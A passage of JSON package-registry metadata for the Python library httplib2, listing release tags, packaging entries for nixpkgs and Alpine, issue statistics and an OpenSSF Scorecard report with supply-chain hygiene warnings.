.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T07:23:52.227Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.httplib2?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python311Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":4331,"html_url":null,"role":null,"created_at":"2026-03-04T04:48:28.608Z","updated_at":"2026-03-04T04:48:28.608Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":3095},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-08-25T05:04:39.690Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}},{"id":6114001,"name":"py2-httplib2","ecosystem":"alpine","description":"A Python HTTP client library (for python2)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2017-10-31T19:04:59.000Z","latest_release_published_at":"2017-10-31T19:04:59.000Z","latest_release_number":"0.10.3-r0","last_synced_at":"2026-03-08T18:56:49.115Z","created_at":"2023-01-31T21:25:23.313Z","updated_at":"2026-08-22T07:23:52.230Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.7/main/x86_64/py2-httplib2","install_command":"apk add py2-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: 